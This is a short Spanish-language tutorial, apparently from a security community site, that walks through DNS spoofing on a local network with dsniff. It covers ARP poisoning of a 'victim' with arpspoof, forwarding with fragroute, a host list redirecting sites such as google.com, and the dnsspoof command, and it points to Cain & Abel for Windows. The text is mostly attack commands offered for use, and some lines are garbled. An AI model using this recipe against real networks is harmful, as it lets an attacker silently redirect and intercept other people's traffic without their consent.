Para realizar DNS Spoofing en nuestra red local utilizando DSniff realizamos los siguientes pasos:
Primero instalamos el DSniff (si estamos en un entorno debian o derivado ... ubuntu/mint/...)
apt-get install dsniff
si no usamos debian bajar de la pagina oficial (
http://monkey.org/~dugsong/dsniff/) el .tar.gz compilar y ejecutar
una vez tenemos instalada la herramienta necesitamos envenenar las tablas ARP (Address Resolution Protocol) de la "victima":
arpspoof -i "tarjeta (eth0 x eje) -t "I Victimma" "Router"
luego habilitamos e enrutado con fragroutefragroute
fragroute -B1
Creamos un archivo "LISTADNS" con la lista de paginas a suplantar:
"IP"
www.dragonjar.org"IP"
www.google.com"IP"
www.carelibro.comy por ultimo lanzamos el ataque
dnsspoof -f LISTADNS
Con esto lograremos que las personas que se encuentren en nuestra red local al escribir en su navegador "
www.dragonjar.org" en realiza redireccionando a la IP que especificamos en el listado, todo esto de manera transparente para "victima".
Si deseas realizar DNS Spoofing en Microsoft Windows, puedes usar Cain & Abel...
Aquí un manual de como hacerlo
http://comunidad.dragonjar.org/index.php/topic,850.0.html
